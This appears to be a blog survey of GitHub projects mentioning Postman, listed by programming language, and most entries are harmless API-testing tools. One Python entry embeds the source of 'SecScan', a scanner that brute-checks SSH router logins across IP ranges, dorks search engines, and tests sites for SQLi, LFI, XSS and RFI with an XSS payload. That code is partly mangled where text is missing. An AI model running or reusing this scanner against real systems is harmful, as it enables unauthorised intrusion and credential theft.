Search for "Postman" on GitHub

When you search for "Postman" on GitHub you get back 7,404 (6,200 when I started this work). Whether you are searching through the GitHub UI or API you are limited to pulling the first 1,000 results, introducing some significant constraints if you want to pull the entire datasets. To pull the data incrementally over time across a wide vocabulary I created a Postman collection to do the hard work, storing the data in a Postman environment. At about 5,100 records, working within Postman became unwieldy and I published the data to a custom external system for processing.

After developing the vocabulary to help me search for GitHub results, narrowing down the search scope for each request I was eventually able to get all of the results, but then also was able to develop a way of viewing results, helping me filter, sort, and make sense of the different types of projects being built on GitHub using Postman. While there is still a significant amount of work to be done on the vocabulary I am using to bring this all into focus, I think it is beginning to paint a pretty dynamic picture of what is happening across the API landscape using Postman.

Results by Language (Top 100 Keywords) (Top 500 Keywords) (Brands) (Standards) (Users)

This lists results by programming languages, showing the preferred languages when it comes to making sense of what is happening across GitHub with Postman.

python (53 listings) (Back to Top)

k3rn3l-p4n1c/postpython
collection, library, python, runner
Postman collection runner library for python 29 stars 29 watchers 7 forks
kayie77/PyTestApiAuto
json, pytest, python, test
pytest+allure基于python的接口自动化集成框架:发送请求、数据自动采集(postman抓包的json数据)、全局配置、接口断言、日志记录、allure报告 16 stars 16 watchers 8 forks
flyworker/python-automation-testing
application, applications, automat, automate, automated, automation, python, river, software, test, testing, web app
Learn about automated software testing with Python, Selenium WebDriver, and API, Postman, focusing on web applications. 0 stars 0 watchers 12 forks
udinparla/aa.py
address, admin, api blueprint, asyncapi, automat, automatic, automatically, class, correct, crawler, creation, data, file, find, free, google, header, host, html, http, import, json schema, link, list, location, mail, oauth, openid, output, pages, print, python, random, reading, result, route, router, running, search, seek, send, sends, site, source, sql, task, test, user
#!/usr/bin/env python import re import hashlib import Queue from random import choice import threading import time import urllib2 import sys import socket try: import paramiko PARAMIKO_IMPORTED = True except ImportError: PARAMIKO_IMPORTED = False USER_AGENT = ["Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3", "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7", "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)", "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)", "YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)", "Mozilla/5.0 (Windows; U; Windows NT 5.1) AppleWebKit/535.38.6 (KHTML, like Gecko) Version/5.1 Safari/535.38.6", "Mozilla/5.0 (Macintosh; U; U; PPC Mac OS X 10_6_7 rv:6.0; en-US) AppleWebKit/532.23.3 (KHTML, like Gecko) Version/4.0.2 Safari/532.23.3" ] option = ' ' vuln = 0 invuln = 0 np = 0 found = [] class Router(threading.Thread): """Checks for routers running ssh with given User/Pass""" def __init__(self, queue, user, passw): if not PARAMIKO_IMPORTED: print 'You need paramiko.' print 'http://www.lag.net/paramiko/' sys.exit(1) threading.Thread.__init__(self) self.queue = queue self.user = user self.passw = passw def run(self): """Tries to connect to given Ip on port 22""" ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) while True: try: ip_add = self.queue.get(False) except Queue.Empty: break try: ssh.connect(ip_add, username = self.user, password = self.passw, timeout = 10) ssh.close() print "Working: %s:22 - %s:%s\n" % (ip_add, self.user, self.passw) write = open('Routers.txt', "a+") write.write('%s:22 %s:%s\n' % (ip_add, self.user, self.passw)) write.close() self.queue.task_done() except: print 'Not Working: %s:22 - %s:%s\n' % (ip_add, self.user, self.passw) self.queue.task_done() class Ip: """Handles the Ip range creation""" def __init__(self): self.ip_range = [] self.start_ip = raw_input('Start ip: ') self.end_ip = raw_input('End ip: ') self.user = raw_input('User: ') self.passw = raw_input('Password: ') self.iprange() def iprange(self): """Creates list of Ip's from Start_Ip to End_Ip""" queue = Queue.Queue() start = list(map(int, self.start_ip.split("."))) end = list(map(int, self.end_ip.split("."))) tmp = start self.ip_range.append(self.start_ip) while tmp != end: start[3] += 1 for i in (3, 2, 1): if tmp[i] == 256: tmp[i] = 0 tmp[i-1] += 1 self.ip_range.append(".".join(map(str, tmp))) for add in self.ip_range: queue.put(add) for i in range(10): thread = Router(queue, self.user, self.passw ) thread.setDaemon(True) thread.start() queue.join() class Crawl: """Searches for dorks and grabs results""" def __init__(self): if option == '4': self.shell = str(raw_input('Shell location: ')) self.dork = raw_input('Enter your dork: ') self.queue = Queue.Queue() self.pages = raw_input('How many pages(Max 20): ') self.qdork = urllib2.quote(self.dork) self.page = 1 self.crawler() def crawler(self): """Crawls Ask.com for sites and sends them to appropriate scan""" print '\nDorking...' for i in range(int(self.pages)): host = "http://uk.ask.com/web?q=%s&page=%s" % (str(self.qdork), self.page) req = urllib2.Request(host) req.add_header('User-Agent', choice(USER_AGENT)) response = urllib2.urlopen(req) source = response.read() start = 0 count = 1 end = len(source) numlinks = source.count('_t" href', start, end) while count alert('xssBYm0le');""" self.file = 'xss.txt' def run(self): """Checks Url for possible Xss""" while True: try: site = self.queue.get(False) except Queue.Empty: break if '=' in site: global vuln global invuln global np xsite = site.rsplit('=', 1)[0] if xsite[-1] != "=": xsite = xsite + "=" test = xsite + self.xchar try: conn = urllib2.Request(test) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() data = opener.open(conn).read() except: self.queue.task_done() else: if (re.findall("xssBYm0le", data, re.I)): self.xss(test) vuln += 1 else: print B+test + W+' > ' + str(vuln) + G+' Vulnerable Sites Found' + W print '>> ' + str(invuln) + G+' Sites Not Vulnerable' + W print '>> ' + str(np) + R+' Sites Without Parameters' + W if option == '1': print '>> Output Saved To sqli.txt\n' elif option == '2': print '>> Output Saved To lfi.txt' elif option == '3': print '>> Output Saved To xss.txt' elif option == '4': print '>> Output Saved To rfi.txt' W = "\033[0m"; R = "\033[31m"; G = "\033[32m"; O = "\033[33m"; B = "\033[34m"; def main(): """Outputs Menu and gets input""" quotes = [ '\[email protected]\n' ] print (O+''' ------------- -- SecScan -- --- v1.5 ---- ---- by ----- --- m0le ---- -------------''') print (G+''' -[1]- SQLi -[2]- LFI -[3]- XSS -[4]- RFI -[5]- Proxy -[6]- Admin Page Finder -[7]- Sub Domain Scan -[8]- Dictionary MD5 cracker -[9]- Online MD5 cracker -[10]- Check your IP address''') print (B+''' -[!]- If freeze while running or want to quit, just Ctrl C, it will automatically terminate the job. ''') print W global option option = raw_input('Enter Option: ') if option: if option == '1': Crawl() output() print choice(quotes) elif option == '2': Crawl() output() print choice(quotes) elif option == '3': Crawl() output() print choice(quotes) elif option == '4': Crawl() output() print choice(quotes) elif option == '5': Ip() print choice(quotes) elif option == '6': admin() aprint() print choice(quotes) elif option == '7': subd() print choice(quotes) elif option == '8': word() print choice(quotes) elif option == '9': OnlineCrack().crack() print choice(quotes) elif option == '10': Check().grab() print choice(quotes) else: print R+'\nInvalid Choice\n' + W time.sleep(0.9) main() else: print R+'\nYou Must Enter An Option (Check if your typo is corrected.)\n' + W time.sleep(0.9) main() if __name__ == '__main__': main() 4 stars 4 watchers 0 forks
lqs429521992/postman-jmeter
convert, jmeter, python, tool, tools
a python tools which can convert postman to jmeter 2 stars 2 watchers 1 forks
sashank-tirumala/2R_Drawing_Robot
codes, computer, find, human, image, images, lines, mail, message, problem, python, queries, source
All the code for a 2R manipulator that draws outlines of human images. It is a mix of computer vision code implemented and Matlab and partially lifted from Petr Zikovsky. There is also some python code, which basically solves rural postman problem using Monte Carlo Localization and Genetic Algorithms. These codes are from a combination of various sources online that I unfortunately cannot find now. If any queries drop me a message / mail 1 stars 1 watchers 2 forks
Static-Void-Academy/python-flask-hello
flask, python, service
Hello world Python Flask web service. 0 stars 0 watchers 3 forks
codeasashu/python-postman-parser
collection, parse, parser, postman collection, python, runner
A postman collection parser and runner written in python 1 stars 1 watchers 0 forks
DoctorWhoFR/PostPy
document, documentation, export, form, markdown, python, tool, transform
A python tool to transform postman documentation export into basic markdown for Github Wiki in exemple. 1 stars 1 watchers 0 forks
luisxciv/echo-server
angular, front end, python, server
Postman-like front end built on angular and a RESTful API echo server built with python. 1 stars 1 watchers 0 forks
mhsilveirabr/brazil-northeast-climate
analyse, data, python
Using python to analyse data from Brazilian National Institute of Meteorology (INMET) 1 stars 1 watchers 0 forks
pawanmethre/my-first-Flask-resful-application
api blueprint, application, asyncapi, data, database, flask, flask restful, json schema, oauth, openid, python, rest, restful, sql, sqlite, tool
My first python flask restful application using postman tool which is basically CURD application for items and price using sqlite3 database. 1 stars 1 watchers 0 forks
VictorDeon/Pigeon
communication, component, components, exchange, framework, media, message, messages, python, service, services, type, types
Pigeon is a framework developed in python that was made to intermediate the use of RabbitMQ services in a quick and easy way, these services of communication between components / services through different types of context of exchange of messages 1 stars 1 watchers 0 forks
skyupadhya/restful-db-interface
client, framework, interface, inventory, python, rest, restful, system, test, testing
RESTFUL INVENTORY MANAGEMENT SYSTEM: Rest based inventory management system implemented using Bottle (python based) web framework. System testing was done using Postman REST client. 0 stars 0 watchers 1 forks
mohamed-abdo/api-test-suit
python, runner, test
postman runner from python 0 stars 0 watchers 1 forks
prakhardg/Network-Graph-Optimization-Through-Route-Discovering-Mechanism
application, python
A python application to Chinese Postman Problem 0 stars 0 watchers 1 forks
denwood/linux_desktop_tools
compose, desktop, docker, dump, intallation, python, tool, tools
Basic tools intallation by Ansible 2.7 for Linux Desktop : VisualCode + Extension pack, python, pychar, git, gitgrakcen, zsh, terminator, tcpdump, subl3txt, postman, docker , docker-compose, ... 0 stars 0 watchers 0 forks
Shekhar-Shashank/Complaint-Lodging
android, api blueprint, asyncapi, complaint, data, database, design, designed, dummy, flask, front end, generator, java, json schema, lang, language, oauth, openid, parse, python, rest, restful, server, sql, sqlite, studio, test, testing
It is an android complaint lodging app in which the front end is designed in android studio using java language. The restful API that the app interacts with is made using python flask. The database used is sqlite. And the language used to parse the data from the server is Json. For testing the requests like get and post we used postman as a dummy request generator. 0 stars 0 watchers 0 forks
andreasmmadjiah/REST-API-testing
python, test, testing
Simple API testing using pythonanywhere and postman 0 stars 0 watchers 0 forks
aw84/python-postman
description, python, script
No description available. 0 stars 0 watchers 0 forks
bennzhang/python-google-pubsub
description, google, pubsub, python, script
No description available. 0 stars 0 watchers 0 forks
dorukismen/blockchain_python
blockchain, chai, python
To create and mine a blockchain on python with Flask and Postman 0 stars 0 watchers 0 forks
kenny1902/python-postman
description, python, script
No description available. 0 stars 0 watchers 0 forks
rifkegribenes/python-testing-postman
description, python, script, test, testing
No description available. 0 stars 0 watchers 0 forks
BenoitRoberge/ChinesePostmanProblem
problem, python
a genetic algorithm (in python) to deal with Chinese Postman problem 0 stars 0 watchers 0 forks
chakshuahuja/Remit-Box
config, configurable, email, emails, mail, offline, python, script, send
API Hack Day - Made a python script using APIs of Exotel, SendGrid, Postman to send configurable emails in offline mode via SMS 0 stars 0 watchers 0 forks
cnkei/python-postman
list, mail, multiple, python, send, sender
A SMTP mail sender in Python that accepts a list of recipients and multiple attachment 0 stars 0 watchers 0 forks
codeasashu/python-postman-restmocker
application, example, exposes, flask, host, local, mock, mocks, python, rest
This python exposes a flask application which mocks your postman example on localhost 0 stars 0 watchers 0 forks
Dewgong444/REST-API-Final
auth, authenticator, python, test, tested
A simple REST API which uses python, HTML, a simple authenticator, and is tested with Postman 0 stars 0 watchers 0 forks
Drinkey/python-pmc
python
Postman Collection Parser/Builder in Python 0 stars 0 watchers 0 forks
gayanherath/PostManDataProviderCSVCreator
data, file, python, script
This is the python script that create the CSV data file that can be used to POSTMan 0 stars 0 watchers 0 forks
Gladysgyy/best-test
jmeter, python, test
postman jmeter python 0 stars 0 watchers 0 forks
guillain/Postman-CLI-tools
python, tool, tools
Postman python tools 0 stars 0 watchers 0 forks
hefvcjm/postman
json, python
用python生成postman的json文件,将该文件导入postman可以运行 0 stars 0 watchers 0 forks
JohnKiely/postManPy
python, tool
A simple tool created in python to investigate Http requests. 0 stars 0 watchers 0 forks
kde713/postman-collection-python
collection, python
Postman Collection SDK written in Python 0 stars 0 watchers 0 forks
langziwd/POSTMAN-RAW
lang, python
python,request,.csv,dict,postman 0 stars 0 watchers 0 forks
LarryKarani/IreporterReactJs
access, application, auth, check, clone, command, coverage, development, download, endpoint, endpoints, environment, flask, following, framework, github, heroku, http, https, install, lang, language, list, local, location, login, machine, program, programming, pytest, python, report, reporter, require, signup, single, source, stat, status, terminal, test, tested, user, users, version, youtube
# iReporterApi iReporter is an application whose aim is to reduce corruption in Africa and foster economic development. It allows users to create red flags and interventions. It implents the following list of APIs. ### Framework used The application is built using python: flask framework. >[Flask](http://flask.pocoo.org/) is a microframework for the Python programming language. ### End points Method | Endpoint | Usage | | ---- | ---- | --------------- | |POST| `/api/v2/auth/signup` | Register a user. | |POST| `api/v2/auth/login` | Login user.| |POST| `api/v2/auth/logout` | Logs out a user.| |POST| `api/v2/interventions` | Create a new incident. | |GET| `api/v2/interventions` | Get all the created incidents. | |GET| `api/v2/interventions/user` | Get all incident of the logged in user. | |GET| `api/v2/interventions/` | Get a single incident. | |PATCH| `api/v2/interventions//location` | Update a single incident location. | |PATCH| `api/v2/interventions//comment` | Update a single incident comment. | |PATCH| `api/v2/interventions//status` | Update a single incident status. | |DELETE| `api/v2/interventions/` | Delete a single incident. | ## Installation 🕵 - To run on local machine git clone this project : ``` $ git clone https://github.com/larryTheGeek/iReporterApi.git ``` Copy and paste the above command in your terminal, the project will be downloaded to your local machine. To Install python checkout: ``` https://www.python.org/ ``` - create a virtualenv and make it use python 3 using the following command. ``` $ virtualenv -p python3 env ``` - activate the virtual environment ``` $ source env/bin/activate ``` - Install Requirements ``` $ pip install -r requirements.txt ``` ### Testing - Run Test using pytest with the following command ``` $ py.test --cov=app test` ``` you will get the test coverage report on your terminal The app can also be tested via Postman - Run App ``` $ python run.py ``` The app should be accessiable via : http://127.0.0.1:5000/ open postman and navigate to the API endpoints described above ### HEROKU URL https://ireporter-version2.herokuapp.com/api/v2/ ### Owner - Larry Karani ### Motivation https://www.youtube.com/watch?v=wHRUDL7GKmI 0 stars 0 watchers 0 forks
leihto/postman
python
Simple postman written in python 0 stars 0 watchers 0 forks
lilitam/stores_rest_api_test
case, cases, design, designed, python, rest, store, stores, test
Rest API - test cases designed in python and with Postman 0 stars 0 watchers 0 forks
luyh/postman_api_2_python
python, test
API test with postman and python 0 stars 0 watchers 0 forks
prince21298/Flask-in-python
codes, python
how to codes run on postman 0 stars 0 watchers 0 forks
ruipoliveira/postmanapi-python
client, library, python
Postman Python client library 0 stars 0 watchers 0 forks
satya497/Movies_Filtering
compose, data, database, docker, form, operation, operations, python, running
it will get data from database and perform operations using python and running in docker compose and input will taken postman. 0 stars 0 watchers 0 forks
sharmacloud/Postman
cloud, future, image, images, official, python, scheduling, system, unofficial, user, video
A scheduling system written in python around the unofficial instagram_api to post images and videos to a user's instagram any time into the future. 0 stars 0 watchers 0 forks
ShashwatVv/Flask-Based-REST-API
book, client, framework, python, send, test, tests
A REST API build using python and its microframework Flask which handles request_response and a book dictionary. All the tests and client requests are send using Postman API client. 0 stars 0 watchers 0 forks
sumeetrohra/cryptocurrency
crypto, cryptocurrency, currency, python, test, tested
This is a basic cryptocurrency made using python Flask and tested in postman 0 stars 0 watchers 0 forks
Waitfish/python_postman
file, python
Test for postman file. 0 stars 0 watchers 0 forks
WendellOdom/Basic-Python-Data-Types-01
copy, data, program, python, sequence, type, types
A sequence about Python Data types that leads to a circle of python data, JSON, Postman REST calls, and copying code into a Python program. 0 stars 0 watchers 0 forks
x0y-gt/postman
email, mail, python, send
Library to send email in python 0 stars 0 watchers 0 forks
yashdeepk/restapi
application, data, endpoint, endpoints, flask, form, format, header, json, python, rest, restapi, verify
Web Service API using python and flask. A Flask application that expose the RESTful URL endpoints. All data sent to and from the API is in JSON format with the Content-Type header field set to application/json. Used postman to verify the outcome. 0 stars 0 watchers 0 forks
yezl77/mypostman_py
python
python like postman good 0 stars 0 watchers 0 forks
zyzz19951230/RequestSimulator
design, designed, development, program, python, server, simulate, simulates, test, tests
A python program that simulates request to a server and handle its response just like Postman, it‘s designed to run tests for web developments. 0 stars 0 watchers 0 forks

java (52 listings) (Back to Top)

stategen/stategen
flutter, free, freemarker, github, http, https, java, mock, provider, react, script, spring, stat, type, types, typescript
通用springMvc/springBoot分布式非强迫性全栈架构(java服务端,H5、iOS、andriod前端),内含大名鼎鼎的支付宝dalgen之freemarker开源实现之商用升级版dalgenX,是唯一支持迭代开发的全栈代码生成器,大量前、后端代码通过生成器生成,其中后端任意api直接生成前端网络调用、状态化、交互等相关代码,把前后端分离开发"拉"回来,目前前端已支持react(dva+umi+typescript)和flutter(provider),后续加入kotlin、swf。免去前端文档、调试、postman、mockjs...繁琐。开发中迭代生成,不改变原开发流程、生成80%代码,兼容后20%你自己的代码,拒绝挖坑! https://github.com/stategen/stategen 44 stars 44 watchers 10 forks
Manojvg1995/GET-POST-method-call-using-jquery-and-javascript
fake, java, javascript, jquery, method, query, script, upload, uploading
Hello , In this project I'm uploading how Call get and post method using jquery and javascript using online fake apis. 5 stars 5 watchers 1 forks
benfluleck/random-phone-number-generator
file, generate, generator, implements, java, javascript, order, phone, random, script, spec
Random number generator is a full stack javascript app that implements a simple way to generate phone numbers in a file in an order specified 4 stars 4 watchers 2 forks
hakaneroztekin/glassdoor-top-rated-scraper-javascript
java, javascript, scraper, script, wondered
💯 Ever wondered the top rated companies in Istanbul on Glassdoor? ☕ Tech stack: Java 11, Spring Boot, Spring MVC, JavaScript, React, Docker, PostgreSQL, RESTful API, Hibernate, Maven, Material UI, IntelliJ, Postman, SourceTree, Git 3 stars 3 watchers 1 forks
mixaverros88/dockerized-java-api
container, containes, docker, dockerized, file, java, order
A RESTful API with JAX-RS. This repo containes one dockerfile in order to spin up a container. 2 stars 2 watchers 0 forks
onkarpandit/cryptocurrency
blockchain, chai, crypto, cryptocurrency, currency, frontend, implementation, java, local, locally, script
My own cryptocurrency implementation with blockchain and frontend using java script.Hosted locally on postman. 2 stars 2 watchers 0 forks
ashwanikumar04/gulp-postcol
collection, collections, java, module, place, postman collection, postman collections, replace, script
This is gulp module to replace java script code in the postman collections 1 stars 1 watchers 0 forks
elsaVelazquez/cybersecurity
auth, authentication, java, javascript, mongo, script, security
authentication using RESTful API, Vuejs, javascript, postman, mongoDB 1 stars 1 watchers 0 forks
epfox666/postman
java
postman+java 1 stars 1 watchers 0 forks
hakaneroztekin/todo-app-javascript
action, java, javascript, list, script, to do, todo
📜 Keep your fancy list of actions to do. ☕Tech stack: JavaScript, NodeJS, ExpressJS, RESTful API, MySQL, Postman, HTML, CSS and WebStorm 1 stars 1 watchers 0 forks
jiangtianyou/AutoApi
controller, generate, java
Auto generate api for postman from java controller 1 stars 1 watchers 0 forks
marciofso/course-springboot-java-11
boot, course, java, nest, projet, projeto, service, services, spring, springboot, util
Projeto web services com Spring Boot e JPA / Hibernate, também foram utilizadas neste projeto, as ferramentas Maven, Banco de dados H2, PostgreSQL e Postman, que fui utilizado realizar as requisições de CRUD na aplicação, que está online no endereço abaixo. 1 stars 1 watchers 0 forks
Odusanya18/postman-to-slate-examples
docs, example, examples, generate, generated, generator, holds, java, slate
This holds example docs generated by the postman to slate generator written in java 1 stars 1 watchers 0 forks
ddemott/spring-restful-web-services-crud-example
crud, example, function, functions, html, index, java, projects, rest, restful, service, services, spring, test, tested, to do
DESCRIPTION: This project represents a base Spring 4 legacy project for Spring MVC / REST services. The REST services are handled / tested by index.html. This is done so you can see an example of how to call all of the CRUD functions from a web page. Most projects do not make the calls from a web page but from POSTMAN or even from a test function which does you no good if you are trying to figure out how to do call from a webpage. Dependencies ------------ Maven 3.1 Java 8 Spring 4 Spring MVC 4 Jackson Databind javax.servlet-api 3.1 0 stars 0 watchers 1 forks
nikandlv/postman-patcher
java, javascript, patch, render, script
Allows postman to render javascript in preview 0 stars 0 watchers 1 forks
ShuYiBin/PostmanToRetrofit2
collection, java, postman collection
Convert postman collection to Retrofit2 java code 0 stars 0 watchers 1 forks
CarlosEduardoFerreiraRamos/js-postman-newman-csv-writer
collection, data, file, java, javascript, newman, postman collection, script, writer
A javascript csv file writer, receving data from the newman api based on a postman collection 0 stars 0 watchers 0 forks
Mardiv-18/Rest-Api-TSF_NoobCoder
api blueprint, asyncapi, boot, hibernate, java, json schema, mysql, oauth, openid, rest, rest api, spring, spring boot, sql
Task of building rest api with java, spring boot -mvc-hibernate , jpa, mysql, postman 0 stars 0 watchers 0 forks
Shekhar-Shashank/Complaint-Lodging
android, api blueprint, asyncapi, complaint, data, database, design, designed, dummy, flask, front end, generator, java, json schema, lang, language, oauth, openid, parse, python, rest, restful, server, sql, sqlite, studio, test, testing
It is an android complaint lodging app in which the front end is designed in android studio using java language. The restful API that the app interacts with is made using python flask. The database used is sqlite. And the language used to parse the data from the server is Json. For testing the requests like get and post we used postman as a dummy request generator. 0 stars 0 watchers 0 forks
theuggla/javascript-at
application, applications, client, concept, java, javascript, program, ranging, script, server, servers, standalone, test, testing
ranging from small programs to full applications testing out javascript concepts, both as standalone applications, servers and client applications 0 stars 0 watchers 0 forks
rominamc/TesterQA-PROEM
agile, automat, document, drive, java, order, river, service, test, testing, todo, unit
Testing manual:documentación. Metodologias agiles.Kanban.Scrum.Ambientes de testing QC/QA. Software para testing de automatización:Registro de bugs:Redmine,Jira.Regresión: Selenium web driver.Katalon recorder.Testing unitario (java):JUnit.Webservice:Postman 0 stars 0 watchers 0 forks
trunglk16/codegym-java-RESTful-PostMAN
description, java, script
No description available. 0 stars 0 watchers 0 forks
401-advanced-javascript-floyd/Postman-Resty
advance, advanced, java, javascript, script
Postman Type of APP 0 stars 0 watchers 0 forks
andynhn/java-spring-mvc-demo-books
book, books, endpoint, endpoints, java, method, methods, spring, test
Add update and delete methods and test the endpoints with Postman 0 stars 0 watchers 0 forks
ankurjain00/postman-javascript-api-tesing
execution, implementation, java, javascript, sample, script, tesing, test, tests
This is a sample implementation of API tests in Postman with JavaScript with execution in Newman 0 stars 0 watchers 0 forks
CarlosChanta/JavaVtexPostmanGitlabCDCI
concept, java
Prueba de concepto API con java 0 stars 0 watchers 0 forks
ChannaVeera/Fundoo
connection, function, functional, java, java8, mongo, note, swell, user
using java8 functionalitys created using MVC Arch ,RestFull Api,s->{ Like User creating, Varfying user using jms for socket connection ,Api,s note& Label aswell using mongoDB 0 stars 0 watchers 0 forks
cpalmer-atx/RESTful-API
course, engine, engineering, group, java, javascript, mongo, script, software
A group project for my Spring 2019 software engineering course implementing a RESTful API using mongoDB, Postman, and javascript. 0 stars 0 watchers 0 forks
daise18/ProjetoSpring
banco, boot, conceitos, controller, entity, java, json, rest, spring, spring boot, test, util, utilizando
Projeto java com spring boot, spring jpa, utilizando conceitos de microsserviços/apis, banco de dados, json, anotação, repository, entity, rest controllers, testes manuais via postman., 0 stars 0 watchers 0 forks
daniloazevedosanti/trainer-springboot2-java-11
boot, java, spring, springboot, test
Sistema Restful Java 11 - Spring Boot - (Web Api) - Para testes use o postman 0 stars 0 watchers 0 forks
deeep911/JAVA-ElasticSearch-SpringBoot
conducted, host, hosted, java, local, locally, search
Elasticsearch is conducted using SpringBoot in java, hosted locally.Hence, POSTMAN is needed for API usage. 0 stars 0 watchers 0 forks
egorsego/otus_javaqa_13
java, test
Github API test with Postman 0 stars 0 watchers 0 forks
euhenriquemarques/WEBService-Java-springBoot
api blueprint, asyncapi, boot, java, json schema, mysql, oauth, openid, spring, spring boot, sql, tool, tools
WEBService Rest, com java, spring boot, mysql, devtools, jpaRespoitory, e Postman 0 stars 0 watchers 0 forks
islamfawzi/spark2
chrome, framework, java
java 8 - Spark2 framework - Maven3 - Lombok - JettySparkServer - Jackson ObjectMapper - Sql2oModel - Postman chrome extention 0 stars 0 watchers 0 forks
Jespert88/FinalJavaTask
api blueprint, asyncapi, client, hibernate, java, json schema, mysql, oauth, openid, postgres, postgresql, spring, sql, task
Final java task where i have to build a RESTful Api with Java + spring + hibernate + mysql/postgresql + client(HTML / Postman)) 0 stars 0 watchers 0 forks
johnnycupcakes/javaUnirest
implementation, java, rest
Simple implementation for making HTTP raw requests using Postman and the HS API 0 stars 0 watchers 0 forks
jp-2019/springbootDemoTutorial
boot, java, maven, spring, springboot
db using postman, spring, maven, java 0 stars 0 watchers 0 forks
k4l397/newman-dr
client, collection, collections, directory, java, javascript, newman, runs, script, tool, wraps
This is a javascript tool that wraps the newman postman client and runs all collections in a directory. 0 stars 0 watchers 0 forks
mathcoder23/apibuilder
builder, free, freemarker, java
基于postman和freemarker 生成多语言的js java api接口库 0 stars 0 watchers 0 forks
nand1234/newman-javascript
execution, java, javascript, newman, problem, script, test
problematically postman test script execution using Newman 0 stars 0 watchers 0 forks
olvfg/gerenciador-viagens
assert, assurance, http, https, java, quality, test, util, utilizando
https://medium.com/assertqualityassurance/como-construir-e-testar-uma-api-em-java-utilizando-o-postman-baae69d8b8aa 0 stars 0 watchers 0 forks
Raremaa/postmanToApiHtml
blog, blogs, html, http, https, java, logs
一个基于postman的java小工具,用于将postman导出的v1文档转换为html文档(本人仅负责整合,原创者地址:https://www.cnblogs.com/XiOrang/p/5652875.html,https://www.cnblogs.com/xsnd/p/8708817.html) 0 stars 0 watchers 0 forks
rathahin/postman-loader-javascript
config, configuration, java, javascript, script, util, utilities
A utilities to load postman as request configuration 0 stars 0 watchers 0 forks
roba-pivot/organisational-api
action, data, involves, java, organisational, relationship
Organisational api involves java , H2 and postman app done to accomplish data relationship and their interaction using postman . 0 stars 0 watchers 0 forks
samssouza/a-cpp-implementation
chinese, implementation, java, problem
This project is a implementation to the chinese postman problem written in java. 0 stars 0 watchers 0 forks
smichea/meveoman
collection, java, meveo, script, standalone, usable
A meveo script, also usable as a standalone java app, that execute a postman 2.1 collection 0 stars 0 watchers 0 forks
Solijons/Postman-Tests
java, javascript, sample, script, syntax, test, tests, writing
Here is sample of writing tests in post using javascript syntax 0 stars 0 watchers 0 forks
VijayUndrajavarapu/rest
java, rest
postman 0 stars 0 watchers 0 forks
VueVindicator/Blockchain
blockchain, chai, describes, express, java, javascript, network, script
This is a short project that describes the workings of a blockchain network. Built with javascript, express.js and postman 0 stars 0 watchers 0 forks
x0st/java-http-postman
client, http, java
One more http client in Java. 0 stars 0 watchers 0 forks
yonexbat/postmangame
game, java, script
java script game 0 stars 0 watchers 0 forks
zhihuiwang88/ssmgenerator03
controller, entity, generator, java, service
1. 此项目是SSM,使用代码生成器(mybatis-generator)自动生成dao、entity、mapper.xml ,需要自己写controller、service、serviceImpl。不是mybatis-plus-generator自动生成的代码。 2. 使用的日志是log4j 3.简单的CRUD接口写好了且postman测试通过。没有前端页面。 4. 测试类(HouseXiaoServiceImplTest.java)也测试通过。 5. 项目中的DTO、VO没有用到,如果用了,不知道接口测通不。 0 stars 0 watchers 0 forks

nodejs (47 listings) (Back to Top)

lykmapipo/postman
collective, node, nodejs, notification
collective notifications for nodejs(WIP) 4 stars 4 watchers 1 forks
itsmebhavin/nodejs-express-typescript-boilerplate
boiler, boilerplate, express, node, nodejs, script, type, types, typescript
Sample boilerplate project for node.js, express using TypeScript and Gulp. 0 stars 0 watchers 8 forks
timoa/nodejs-encryption-api-example
data, decrypt, example, node, nodejs
Example of encrypting/decrypting data thru an API using node.js 3 stars 3 watchers 1 forks
sjefvanleeuwen/camunda-zaken
case, engine, external, node, nodejs, process, research, search
BPMN research case for zaakgericht werken using camunda process engine on nodejs external workers 2 stars 2 watchers 0 forks
edysegura/nodejs-restful
demonstrate, node, nodejs, rest, restful, test
A simple project to demonstrate how to create RESTful APIs with Node.js and test it with Postman 1 stars 1 watchers 1 forks
tasmia2016831022/WebTechnologyProject
blog, node, nodejs
Simple blog app using nodejs 1 stars 1 watchers 0 forks
ValerioSevilla/nodejs-postman
exposing, node, nodejs, server, test, tests
Example of a Node.js server exposing a simple REST API and tests for that API using Postman 1 stars 1 watchers 0 forks
bohancen/postbuddy
node, nodejs, react
仿照postman,api接口调试工具,使用react+nodejs 1 stars 1 watchers 0 forks
CrisOspina/api-rest-con-nodejs-y-express
express, node, nodejs, rest
API Rest con Nodejs y Express 1 stars 1 watchers 0 forks
MayMP/NodeJsExpressMongoDB
center, collection, command, config, configuration, data, database, directory, download, example, folder, host, http, https, import, install, installed, json, local, mongo, mongod, mongodb, named, node, nodejs, posts, unit
This is a very basic example of (`List All Data`, `Detail By Each Id`, `Create`, `Update`, `Delete`) in Node.js and MongoDB. Running Locally Make sure you have Node.js(`https://nodejs.org/en/`) and the MongoDB for 32-bit(`https://www.mongodb.org/dl/win32/i386`) and for others (`https://www.mongodb.com/download-center/community`) installed. You're gonna need to create a DB named `InterviewDB` and import from the `MongoDB(For Interview)` folder. And please create collection name `posts`. You can adjust the database configuration in `app/config/config.json`. You can run " node app.js " from the project directory in command prompt. You can call url(`localhost:8080`) from your `Postman` or `Restful`. 1 stars 1 watchers 0 forks
rishu488/REST-api-in-nodejs-using-mongoose-express
express, mini, mongo, mongoose, node, nodejs, rest, rest api
its a mini project of creating a rest api using mongoose express and postman 1 stars 1 watchers 0 forks
thneeb/swagger2postman
collection, file, generate, generated, json, node, nodejs, postman collection, spec, swagger, swagger2, test, testing, tool
This little nodejs tool gets a swagger.json on the one hand and generated a postman collection file for testing the specified api on the other hand. 0 stars 0 watchers 0 forks
abelgza/nodejs_postman_example
description, example, node, nodejs, script
No description available. 0 stars 0 watchers 0 forks
amathm/nodejs-test
node, nodejs, test, testing
testing postman and nodejs 0 stars 0 watchers 0 forks
AnishaMohandass/RESTful-using-nodejs-in-postman
description, node, nodejs, script
No description available. 0 stars 0 watchers 0 forks
